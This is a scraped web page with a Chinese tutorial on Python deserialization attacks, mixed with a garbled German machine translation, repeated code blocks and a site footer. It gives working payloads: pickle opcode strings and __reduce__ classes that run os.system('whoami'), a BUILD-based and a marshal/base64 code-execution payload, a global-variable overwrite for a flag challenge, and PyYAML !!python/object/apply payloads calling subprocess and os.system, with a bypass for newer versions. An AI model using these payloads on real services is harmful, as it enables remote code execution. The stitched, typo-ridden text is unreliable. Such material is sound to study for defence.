Machen Sie sich mit der Python-Deserialisierung vertraut
Dieser Artikel vermittelt Ihnen relevantes Wissen über Python, das hauptsächlich verwandte Probleme der Deserialisierung vorstellt: pickle.loads() deserialisiert Strings in Objekte, pickle.load() liest Daten aus einer Datei und deserialisiert sie allen hilfreich sein.
Empfohlenes Lernen: Python-Tutorial
Python-Deserialisierungsschwachstelle
Pickle
- Serialisierung:
pickle.dumps()
Serialisieren Sie das Objekt in eine Zeichenfolge,pickle.dump ()
Speichern Sie die vom Objekt serialisierte Zeichenfolge als Datei - 反序列化:
pickle.loads()
将字符串反序列化为对象、pickle.load()
从文件中读取数据反序列化
pickle.dumps()
将对象序列化为字符串、pickle.dump()
将对象序列化后的字符串存储为文件使用
dumps()
与loads()
时可以使用protocol
参数指定协议版本协议有0,1,2,3,4,5号版本,不同的 python 版本默认的协议版本不同。这些版本中,0号是最可读的,之后的版本为了优化加入了不可打印字符
协议是向下兼容的,0号版本也可以直接使用
可序列化的对象
-
None
、True
和False
- 整数、浮点数、复数
- str、byte、bytearray
- 只包含可封存对象的集合,包括 tuple、list、set 和 dict
- 定义在模块最外层的函数(使用 def 定义,lambda 函数则不可以)
- 定义在模块最外层的内置函数
- 定义在模块最外层的类
-
__dict__
属性值或__getstate__()
函数的返回值可以被序列化的类(详见官方文档的Pickling Class Instances)
反序列化流程
pickle.load()和pickle.loads()方法的底层实现是基于 _Unpickler()方法来反序列化
在反序列化过程中,_Unpickler
(以下称为机器吧)维护了两个东西:栈区和存储区
为了研究它,需要利用一个调试器 pickletools
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wUDq6S9E-1642832623478)(C:UsersAdministratorAppDataRoamingTyporatypora-user-imagesimage-20220121114238511.png)]
从图中可以看出,序列化后的字符串实际上是一串 PVM(Pickle Virtual Machine) 指令码,指令码以栈的形式存储、解析
PVM指令集
完整PVM指令集可以在 pickletools.py
中查看,不同协议版本使用的指令集略有不同
上图中的指令码可以翻译成:
0: \x80 PROTO 3 # 协议版本 2: ] EMPTY_LIST # 将空列表推入栈 3: ( MARK # 将标志推入栈 4: X BINUNICODE 'a' # unicode字符 10: X BINUNICODE 'b' 16: X BINUNICODE 'c' 22: e APPENDS (MARK at 3) # 将3号标准之后的数据推入列表 23: . STOP # 弹出栈中数据,结束 highest protocol among opcodes = 2
指令集中有几个重要的指令码:
- GLOBAL = b’c’ # 将两个以换行为结尾的字符串推入栈,第一个是模块名,第二个是类名,即可以调用全局变量
xxx.xxx
的值 - REDUCE = b’R’ # 将可调用元组和参数元组生成的对象推进栈,即
__reduce()
返回的第一个值作为可执行函数,第二个值为参数,执行函数 - BUILD = b’b’ # 通过
__setstate__
或更新__dict__
完成构建对象,如果对象具有__setstate__
方法,则调用anyobject .__setstate__(参数)
;如果无__setstate__
方法,则通过anyobject.__dict__.update(argument)
更新值(更新可能会产生变量覆盖) - STOP = b’.’ # 结束
一个更复杂的例子:
import pickleimport pickletoolsclass a_class(): def __init__(self): self.age = 24 self.status = 'student' self.list = ['a', 'b', 'c']a_class_new = a_class()a_class_pickle = pickle.dumps(a_class_new,protocol=3)print(a_class_pickle)# 优化一个已经被打包的字符串a_list_pickle = pickletools.optimize(a_class_pickle)print(a_class_pickle)# 反汇编一个已经被打包的字符串pickletools.dis(a_class_pickle)
0: \x80 PROTO 3 2: c GLOBAL '__main__ a_class' 20: ) EMPTY_TUPLE # 将空元组推入栈 21: \x81 NEWOBJ # 表示前面的栈的内容为一个类(__main__ a_class),之后为一个元组(20行推入的元组),调用cls.__new__(cls, *args)(即用元组中的参数创建一个实例,这里元组实际为空) 22: } EMPTY_DICT # 将空字典推入栈 23: ( MARK 24: X BINUNICODE 'age' 32: K BININT1 24 34: X BINUNICODE 'status' 45: X BINUNICODE 'student' 57: X BINUNICODE 'list' 66: ] EMPTY_LIST 67: ( MARK 68: X BINUNICODE 'a' 74: X BINUNICODE 'b' 80: X BINUNICODE 'c' 86: e APPENDS (MARK at 67) 87: u SETITEMS (MARK at 23) # 将将从23行开始传入的值以键值对添加到现有字典中 88: b BUILD # 更新字典完成构建 89: . STOP highest protocol among opcodes = 2
常见的函数执行
与函数执行相关的 PVM 指令集有三个: R
、 i
、 o
,所以我们可以从三个方向进行构造:
R
:
b'''cos system (S'whoami' tR.'''
i
:
b'''(S'whoami' ios system .'''
o
:
b'''(cos system S'whoami' o.'''
__reduce()__命令执行
__recude()__
魔法函数会在反序列化过程结束时自动调用,并返回一个元组。其中,第一个元素是一个可调用对象,在创建该对象的最初版本时调用,第二个元素是可调用对象的参数,使得反序列化时可能造成RCE漏洞
触发
__reduce()_
的指令码为``R,**只要在序列化中的字符串中存在
R指令**,
reduce方法就会被执行,无论正常程序中是否写明了
reduce`方法pickle 在反序列化时会自动 import 未引入的模块,所以 python 标准库中的所有代码执行、命令执行函数都可使用,但生成
Verwenden Siepayload
Deserialisierung:pickle.loads()
Deserialisieren Sie die Zeichenfolge in ein Objekt,pickle.load() code> Daten aus der Datei lesen und deserialisieren<blockquote></blockquote>
dumps()
undloads()
Sie können denprotocol
-Parameter zur Angabe der Protokollversion. Das Protokoll hat die Versionen 0, 1, 2, 3, 4 und 5. Verschiedene Python-Versionen haben unterschiedliche Standardprotokollversionen. Unter diesen Versionen ist Nummer 0 die am besten lesbare. Version 0 kann auch direkt verwendet werden /h3>
None
, True
und False
__dict__
Attributwert oder __getstate__ ()
Eine Klasse, deren Funktionsrückgabewert serialisiert werden kann (Einzelheiten finden Sie unter Pickling Class Instances in der offiziellen Dokumentation)
Deserialisierungsprozess h3>🎜Die zugrunde liegende Implementierung der Methoden pickle.load() und pickle.loads() basiert auf der _Unpickler()-Methode zur Deserialisierung🎜🎜Im Deserialisierungsprozess wird _Unpickler
(im Folgenden als Machine Bar) verwaltet zwei Dinge: den Stapelbereich und den Speicherbereich. 🎜🎜Um es zu untersuchen, müssen Sie einen Debugger pickletools
verwenden über einen Anti-Leeching-Mechanismus verfügen, wird empfohlen, das Bild zu speichern und direkt hochzuladen (img-wUDq6S9E-1642832623478) (C:UsersAdministratorAppDataRoamingTyporatypora-user-imagesimage-20220121114238511.png)]🎜🎜Wie Sie auf dem Bild sehen können, ist das Die serialisierte Zeichenfolge ist eigentlich eine Zeichenfolge des PVM-Anweisungscodes (Pickle Virtual Machine). Der Anweisungscode wird in Form eines Stapels gespeichert und analysiert🎜PVM-Anweisungssatz
🎜Das Ganze Der PVM-Befehlssatz ist unter pickletools.py code> zu finden. Die von den verschiedenen Protokollversionen verwendeten Befehlssätze unterscheiden sich geringfügig Befehlscodes im Befehlssatz: 🎜🎜🎜GLOBAL = b'c' # Schieben Sie zwei Zeichenfolgen, die mit einer neuen Zeile enden, auf den Stapel. Die erste ist der Modulname und die zweite ist der Klassenname. Das heißt, der Wert des Global Variable <code>xxx.xxx
kann aufgerufen werden🎜 REDUCE = b'R' # Schieben Sie das vom aufrufbaren Tupel und dem Parametertupel generierte Objekt auf den Stapel, dh den ersten von zurückgegebenen Wert __reduce()
wird als ausführbare Funktion verwendet, und der zweite Wert wird als Parameter verwendet, Funktion ausführen🎜BUILD = b'b' # Vervollständigen Sie die Konstruktion des Objekts bis __setstate__ oder update __dict__
, wenn das Objekt die Methode __setstate__
hat, dann rufen Sie anyobject .__setstate__(argument)
auf, wenn Es gibt keine __setstate__
-Methode. Verwenden Sie anyobject.__dict__.update(argument)
, um den Wert zu aktualisieren (Updates können zu Variablenüberschreibungen führen)🎜STOP = b'.' # Ende🎜Ein komplexeres Beispiel: 🎜class a_class():
def __reduce__(self):
return os.system, ('whoami',)# __reduce__()魔法方法的返回值:# os.system, ('whoami',)# 1.满足返回一个元组,元组中至少有两个参数# 2.第一个参数是被调用函数 : os.system()# 3.第二个参数是一个元组:('whoami',),元组中被调用的参数 'whoami' 为被调用函数的参数# 4. 因此序列化时被解析执行的代码是 os.system('whoami')
Nach dem Login kopierenNach dem Login kopieren
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.'
0: \x80 PROTO 3
2: c GLOBAL 'nt system'
13: X BINUNICODE 'whoami'
24: \x85 TUPLE1
25: R REDUCE
26: . STOP
highest protocol among opcodes = 2
Nach dem Login kopierenNach dem Login kopieren
Gemeinsame Funktionsausführung
🎜Es gibt drei PVM-Befehlssätze bezogen auf die Funktionsausführung: R
, i
, o
. Wir können also aus drei Richtungen konstruieren: 🎜🎜R
: 🎜# secret.pya = aaaaaa
Nach dem Login kopierenNach dem Login kopieren🎜i
: 🎜# unser.pyimport secretimport pickleclass flag():
def __init__(self, a):
self.a = a
your_payload = b'?'other_flag = pickle.loads(your_payload)secret_flag = flag(secret)if other_flag.a == secret_flag.a:
print('flag:{}'.format(secret_flag.a))else:
print('No!')
Nach dem Login kopierenNach dem Login kopieren🎜o
: 🎜class flag():
def __init__(self, a):
self.a = a
new_flag = pickle.dumps(Flag("A"), protocol=3)flag = pickletools.optimize(new_flag)print(flag)print(pickletools.dis(new_flag))
Nach dem Login kopierenNach dem Login kopieren
__reduce()__ Befehlsausführung
🎜__recude()__
Die magische Funktion wird am Ende des Deserialisierungsprozesses automatisch aufgerufen und gibt ein Tupel zurück. Darunter ist das erste Element ein aufrufbares Objekt, das beim Erstellen der ersten Version des Objekts aufgerufen wird. Das zweite Element ist der Parameter des aufrufbaren Objekts, der während der Deserialisierung zu einer RCE-Sicherheitslücke führen kann Der Anweisungscode von >__reduce()_ ist „R, **Solange die
R-Anweisung in der zu serialisierenden Zeichenfolge vorhanden ist**,
reduce wird unabhängig davon ausgeführt, ob die Methode
reduce im normalen Programm angegeben ist. 🎜🎜pickle wird dabei automatisch ausgeführt Deserialisierung Importieren Sie Module, die nicht eingeführt wurden, sodass alle Codeausführungs- und Befehlsausführungsfunktionen in der Python-Standardbibliothek verwendet werden können, aber die Python-Version, die Nutzlast
generiert, ist am besten mit dem Ziel konsistent 🎜🎜🎜Beispiel: 🎜class a_class():
def __reduce__(self):
return os.system, ('whoami',)# __reduce__()魔法方法的返回值:# os.system, ('whoami',)# 1.满足返回一个元组,元组中至少有两个参数# 2.第一个参数是被调用函数 : os.system()# 3.第二个参数是一个元组:('whoami',),元组中被调用的参数 'whoami' 为被调用函数的参数# 4. 因此序列化时被解析执行的代码是 os.system('whoami')
Nach dem Login kopierenNach dem Login kopieren
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.'
0: \x80 PROTO 3
2: c GLOBAL 'nt system'
13: X BINUNICODE 'whoami'
24: \x85 TUPLE1
25: R REDUCE
26: . STOP
highest protocol among opcodes = 2
Nach dem Login kopierenNach dem Login kopieren
class a_class(): def __reduce__(self): return os.system, ('whoami',)# __reduce__()魔法方法的返回值:# os.system, ('whoami',)# 1.满足返回一个元组,元组中至少有两个参数# 2.第一个参数是被调用函数 : os.system()# 3.第二个参数是一个元组:('whoami',),元组中被调用的参数 'whoami' 为被调用函数的参数# 4. 因此序列化时被解析执行的代码是 os.system('whoami')
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.' b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.' 0: \x80 PROTO 3 2: c GLOBAL 'nt system' 13: X BINUNICODE 'whoami' 24: \x85 TUPLE1 25: R REDUCE 26: . STOP highest protocol among opcodes = 2
# secret.pya = aaaaaa
# unser.pyimport secretimport pickleclass flag(): def __init__(self, a): self.a = a your_payload = b'?'other_flag = pickle.loads(your_payload)secret_flag = flag(secret)if other_flag.a == secret_flag.a: print('flag:{}'.format(secret_flag.a))else: print('No!')
class flag(): def __init__(self, a): self.a = a new_flag = pickle.dumps(Flag("A"), protocol=3)flag = pickletools.optimize(new_flag)print(flag)print(pickletools.dis(new_flag))
__reduce()__ Befehlsausführung
class a_class(): def __reduce__(self): return os.system, ('whoami',)# __reduce__()魔法方法的返回值:# os.system, ('whoami',)# 1.满足返回一个元组,元组中至少有两个参数# 2.第一个参数是被调用函数 : os.system()# 3.第二个参数是一个元组:('whoami',),元组中被调用的参数 'whoami' 为被调用函数的参数# 4. 因此序列化时被解析执行的代码是 os.system('whoami')
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.' b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.' 0: \x80 PROTO 3 2: c GLOBAL 'nt system' 13: X BINUNICODE 'whoami' 24: \x85 TUPLE1 25: R REDUCE 26: . STOP highest protocol among opcodes = 2
将该字符串反序列化后将会执行命令 os.system('whoami')
全局变量覆盖
__reduce()_
利用的是 R 指令码,造成REC,而利用 GLOBAL = b’c’ 指令码则可以触发全局变量覆盖
# secret.pya = aaaaaa
# unser.pyimport secretimport pickleclass flag(): def __init__(self, a): self.a = a your_payload = b'?'other_flag = pickle.loads(your_payload)secret_flag = flag(secret)if other_flag.a == secret_flag.a: print('flag:{}'.format(secret_flag.a))else: print('No!')
在不知道 secret.a 的情况下要如何获得 flag 呢?
先尝试获得 flag() 的序列化字符串:
class flag(): def __init__(self, a): self.a = a new_flag = pickle.dumps(Flag("A"), protocol=3)flag = pickletools.optimize(new_flag)print(flag)print(pickletools.dis(new_flag))
b'\x80\x03c__main__\nFlag\n)\x81}X\x01\x00\x00\x00aX\x01\x00\x00\x00Asb.' 0: \x80 PROTO 3 2: c GLOBAL '__main__ Flag' 17: q BINPUT 0 19: ) EMPTY_TUPLE 20: \x81 NEWOBJ 21: q BINPUT 1 23: } EMPTY_DICT 24: q BINPUT 2 26: X BINUNICODE 'a' 32: q BINPUT 3 34: X BINUNICODE 'A' 40: q BINPUT 4 42: s SETITEM 43: b BUILD 44: . STOP highest protocol among opcodes = 2
可以看到,在34行进行了传参,将变量 A 传入赋值给了a。若将 A 修改为全局变量 secret.a,即将 X BINUNICODE 'A'
改为 c GLOBAL 'secret a'
(X\x01\x00\x00\x00A
改为 csecret\na\n
)。将该字符串反序列化后,self.a 的值等于 secret.a 的值,成功获取 flag
除了改写 PVM 指令的方式外,还可以使用 exec 函数造成变量覆盖:
test1 = 'test1'test2 = 'test2'class A: def __reduce(self): retutn exec, "test1='asd'\ntest2='qwe'"Nach dem Login kopieren
利用BUILD指令RCE(不使用R指令)
通过BUILD指令与GLOBAL指令的结合,可以把现有类改写为os.system
或其他函数
假设某个类原先没有__setstate__
方法,我们可以利用{'__setstate__': os.system}
来BUILE这个对象
BUILD指令执行时,因为没有__setstate__
方法,所以就执行update,这个对象的__setstate__
方法就改为了我们指定的os.system
接下来利用'whoami'
来再次BUILD这个对象,则会执行setstate('whoami')
,而此时__setstate__
已经被我们设置为os.system
,因此实现了RCE
例:
代码中存在一个任意类:
class payload: def __init__(self): pass
根据这个类构造 PVM 指令:
0: \x80 PROTO 3 2: c GLOBAL '__main__ payload' 17: q BINPUT 0 19: ) EMPTY_TUPLE 20: \x81 NEWOBJ 21: } EMPTY_DICT # 使用BUILD,先放入一个字典 22: ( MARK # 放值前先放一个标志 23: V UNICODE '__setstate__' # 放键值对 37: c GLOBAL 'nt system' 48: u SETITEMS (MARK at 22) 49: b BUILD # 第一次BUILD 50: V UNICODE 'whoami' # 加参数 58: b BUILD # 第二次BUILD 59: . STOP
将上述 PVM 指令改写成 bytes 形式:b'\x80\x03c__main__\npayload\n)\x81}(V__setstate__\ncnt\nsystem\nubVwhoami\nb.'
,使用 piclke.loads()
反序列化后成功执行命令
利用Marshal
模块造成任意函数执行
pickle 不能将代码对象序列化,但 python 提供了一个可以序列化代码对象的模块 Marshal
但是序列化的代码对象不再能使用 __reduce()_
调用,因为__reduce__
是利用调用某个可调用对象并传递参数来执行的,而我们这个函数本身就是一个可调用对象 ,我们需要执行它,而不是将他作为某个函数的参数。隐藏需要利用 typres
模块来动态的创建匿名函数
import marshalimport typesdef code(): import os print('hello') os.system('whoami')code_pickle = base64.b64encode(marshal.dumps(code.__code__)) # python2为 code.func_codetypes.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')() # 利用types动态创建匿名函数并执行
在 pickle
上使用:
import pickle# 将types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')()改写为 PVM 的形式s = b"""ctypes FunctionType (cmarshal loads (cbase64 b64decode (S'4wAAAAAAAAAAAAAAAAEAAAADAAAAQwAAAHMeAAAAZAFkAGwAfQB0AWQCgwEBAHwAoAJkA6EBAQBkAFMAKQRO6QAAAADaBWhlbGxv2gZ3aG9hbWkpA9oCb3PaBXByaW502gZzeXN0ZW0pAXIEAAAAqQByBwAAAPogRDovUHl0aG9uL1Byb2plY3QvdW5zZXJpYWxpemUucHnaBGNvZGUlAAAAcwYAAAAAAQgBCAE=' tRtRc__builtin__ globals (tRS'' tR(tR."""pickle.loads(s) # 字符串转换为 bytes
漏洞出现位置
- 解析认证 token、session 时
- 将对象 pickle 后存储在磁盘文件
- 将对象 pickle 后在网络中传输
- 参数传递给程序
PyYAML
yaml
是一种标记类语言,类似与 xml
和 json
,各个支持yaml格式的语言都会有自己的实现来进行 yaml
格式的解析(读取和保存),PyYAML
就是 yaml
的 python 实现
在使用 PyYAML
库时,若使用了 yaml.load()
而不是 yaml.safe_load()
函数解析 yaml
文件,则会导致反序列化漏洞的产生
原理
PyYAML
有针对 python 语言特有的标签解析的处理函数对应列表,其中有三个和对象相关:
!!python/object: => Constructor.construct_python_object!!python/object/apply: => Constructor.construct_python_object_apply!!python/object/new: => Constructor.construct_python_object_new
例如:
# Test.pyimport yamlimport osclass test: def __init__(self): os.system('whoami')payload = yaml.dump(test())fp = open('sample.yml', 'w')fp.write(payload)fp.close()
该代码执行后,会生成 sample.yml
,并写入 !!python/object:__main__.test {}
将文件内容改为 !!python/object:Test.test {}
再使用 yaml.load()
解析该 yaml
文件:
import yaml yaml.load(file('sample.yml', 'w'))
命令成功执行。但是命令的执行依赖于 Test.py
的存在,因为 yaml.load()
时会根据yml文件中的指引去读取 Test.py
中的 test
这个对象(类)。如果删除 Test.py
,也将运行失败
Payload
PyYAML
想要消除依赖执行命令,就需要将其中的类或者函数换成 python 标准库中的类或函数,并使用另外两种 python 标签:
# 该标签可以在 PyYAML 解析再入 YAML 数据时,动态的创建 Python 对象!!python/object/apply: => Constructor.construct_python_object_apply# 该标签会调用 apply!!python/object/new: => Constructor.construct_python_object_new
利用这两个标签,就可以构造任意 payload:
!!python/object/apply:subprocess.check_output [[calc.exe]]!!python/object/apply:subprocess.check_output ["calc.exe"]!!python/object/apply:subprocess.check_output [["calc.exe"]]!!python/object/apply:os.system ["calc.exe"]!!python/object/new:subprocess.check_output [["calc.exe"]]!!python/object/new:os.system ["calc.exe"]
PyYAML
>= 5.1
在版本 PyYAML
>= 5.1 后,限制了反序列化内置类方法以及导入并使用不存在的反序列化代码,并且在使用 load()
方法时,需要加上 loader
参数,直接使用时会爆出安全警告
loader的四种类型:
- BaseLoader:仅加载最基本的YAML
- SafeLoader:安全地加载YAML语言的子集,建议用于加载不受信任的输入(safe_load)
- FullLoader:加载完整的YAML语言,避免任意代码执行,这是当前(PyYAML 5.1)默认加载器调用yaml.load(input) (出警告后)(full_load)
- UnsafeLoader(也称为Loader向后兼容性):原始的Loader代码,可以通过不受信任的数据输入轻松利用(unsafe_load)
在高版本中之前的 payload 已经失效,但可以使用 subporcess.getoutput()
方法绕过检测:
!!python/object/apply:subprocess.getoutput - whoami
在最新版本上,命令执行成功
ruamel.yaml
ruamel.yaml的用法和PyYAML基本一样,并且默认支持更新的YAML1.2版本
在ruamel.yaml中反序列化带参数的序列化类方法,有以下方法:
- load(data)
- load(data, Loader=Loader)
- load(data, Loader=UnsafeLoader)
- load(data, Loader=FullLoader)
- load_all(data)
- load_all(data, Loader=Loader)
- load_all(data, Loader=UnSafeLoader)
- load_all(data, Loader=FullLoader)
我们可以使用上述任何方法,甚至我们也可以通过提供数据来反序列化来直接调用load(),它将完美地反序列化它,并且我们的类方法将被执行
推荐学习:python学习教程
Das obige ist der detaillierte Inhalt vonMachen Sie sich mit der Python-Deserialisierung vertraut. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Heiße KI -Werkzeuge

Undresser.AI Undress
KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover
Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool
Ausziehbilder kostenlos

Clothoff.io
KI-Kleiderentferner

AI Hentai Generator
Erstellen Sie kostenlos Ai Hentai.

Heißer Artikel

Heiße Werkzeuge

Notepad++7.3.1
Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version
Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1
Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6
Visuelle Webentwicklungstools

SublimeText3 Mac-Version
Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

Heiße Themen



PHP und Python haben ihre eigenen Vor- und Nachteile, und die Wahl hängt von den Projektbedürfnissen und persönlichen Vorlieben ab. 1.PHP eignet sich für eine schnelle Entwicklung und Wartung großer Webanwendungen. 2. Python dominiert das Gebiet der Datenwissenschaft und des maschinellen Lernens.

Effizientes Training von Pytorch -Modellen auf CentOS -Systemen erfordert Schritte, und dieser Artikel bietet detaillierte Anleitungen. 1.. Es wird empfohlen, YUM oder DNF zu verwenden, um Python 3 und Upgrade PIP zu installieren: Sudoyumupdatepython3 (oder sudodnfupdatepython3), PIP3Install-upgradepip. CUDA und CUDNN (GPU -Beschleunigung): Wenn Sie Nvidiagpu verwenden, müssen Sie Cudatool installieren

Docker verwendet Linux -Kernel -Funktionen, um eine effiziente und isolierte Anwendungsumgebung zu bieten. Sein Arbeitsprinzip lautet wie folgt: 1. Der Spiegel wird als schreibgeschützte Vorlage verwendet, die alles enthält, was Sie für die Ausführung der Anwendung benötigen. 2. Das Union File System (UnionFS) stapelt mehrere Dateisysteme, speichert nur die Unterschiede, speichert Platz und beschleunigt. 3. Der Daemon verwaltet die Spiegel und Container, und der Kunde verwendet sie für die Interaktion. 4. Namespaces und CGroups implementieren Container -Isolation und Ressourcenbeschränkungen; 5. Mehrere Netzwerkmodi unterstützen die Containerverbindung. Nur wenn Sie diese Kernkonzepte verstehen, können Sie Docker besser nutzen.

Python und JavaScript haben ihre eigenen Vor- und Nachteile in Bezug auf Gemeinschaft, Bibliotheken und Ressourcen. 1) Die Python-Community ist freundlich und für Anfänger geeignet, aber die Front-End-Entwicklungsressourcen sind nicht so reich wie JavaScript. 2) Python ist leistungsstark in Bibliotheken für Datenwissenschaft und maschinelles Lernen, während JavaScript in Bibliotheken und Front-End-Entwicklungsbibliotheken und Frameworks besser ist. 3) Beide haben reichhaltige Lernressourcen, aber Python eignet sich zum Beginn der offiziellen Dokumente, während JavaScript mit Mdnwebdocs besser ist. Die Wahl sollte auf Projektbedürfnissen und persönlichen Interessen beruhen.

Aktivieren Sie die Pytorch -GPU -Beschleunigung am CentOS -System erfordert die Installation von CUDA-, CUDNN- und GPU -Versionen von Pytorch. Die folgenden Schritte führen Sie durch den Prozess: Cuda und Cudnn Installation Bestimmen Sie die CUDA-Version Kompatibilität: Verwenden Sie den Befehl nvidia-smi, um die von Ihrer NVIDIA-Grafikkarte unterstützte CUDA-Version anzuzeigen. Beispielsweise kann Ihre MX450 -Grafikkarte CUDA11.1 oder höher unterstützen. Download und installieren Sie Cudatoolkit: Besuchen Sie die offizielle Website von Nvidiacudatoolkit und laden Sie die entsprechende Version gemäß der höchsten CUDA -Version herunter und installieren Sie sie, die von Ihrer Grafikkarte unterstützt wird. Installieren Sie die Cudnn -Bibliothek:

Bei der Auswahl einer Pytorch -Version unter CentOS müssen die folgenden Schlüsselfaktoren berücksichtigt werden: 1. Cuda -Version Kompatibilität GPU -Unterstützung: Wenn Sie NVIDIA -GPU haben und die GPU -Beschleunigung verwenden möchten, müssen Sie Pytorch auswählen, der die entsprechende CUDA -Version unterstützt. Sie können die CUDA-Version anzeigen, die unterstützt wird, indem Sie den Befehl nvidia-smi ausführen. CPU -Version: Wenn Sie keine GPU haben oder keine GPU verwenden möchten, können Sie eine CPU -Version von Pytorch auswählen. 2. Python Version Pytorch

Minio-Objektspeicherung: Hochleistungs-Bereitstellung im Rahmen von CentOS System Minio ist ein hochleistungsfähiges, verteiltes Objektspeichersystem, das auf der GO-Sprache entwickelt wurde und mit Amazons3 kompatibel ist. Es unterstützt eine Vielzahl von Kundensprachen, darunter Java, Python, JavaScript und Go. In diesem Artikel wird kurz die Installation und Kompatibilität von Minio zu CentOS -Systemen vorgestellt. CentOS -Versionskompatibilitätsminio wurde in mehreren CentOS -Versionen verifiziert, einschließlich, aber nicht beschränkt auf: CentOS7.9: Bietet einen vollständigen Installationshandbuch für die Clusterkonfiguration, die Umgebungsvorbereitung, die Einstellungen von Konfigurationsdateien, eine Festplattenpartitionierung und Mini

Die Installation von CentOS-Installationen erfordert die folgenden Schritte: Installieren von Abhängigkeiten wie Entwicklungstools, PCRE-Devel und OpenSSL-Devel. Laden Sie das Nginx -Quellcode -Paket herunter, entpacken Sie es, kompilieren Sie es und installieren Sie es und geben Sie den Installationspfad als/usr/local/nginx an. Erstellen Sie NGINX -Benutzer und Benutzergruppen und setzen Sie Berechtigungen. Ändern Sie die Konfigurationsdatei nginx.conf und konfigurieren Sie den Hörport und den Domänennamen/die IP -Adresse. Starten Sie den Nginx -Dienst. Häufige Fehler müssen beachtet werden, z. B. Abhängigkeitsprobleme, Portkonflikte und Konfigurationsdateifehler. Die Leistungsoptimierung muss entsprechend der spezifischen Situation angepasst werden, z. B. das Einschalten des Cache und die Anpassung der Anzahl der Arbeitsprozesse.
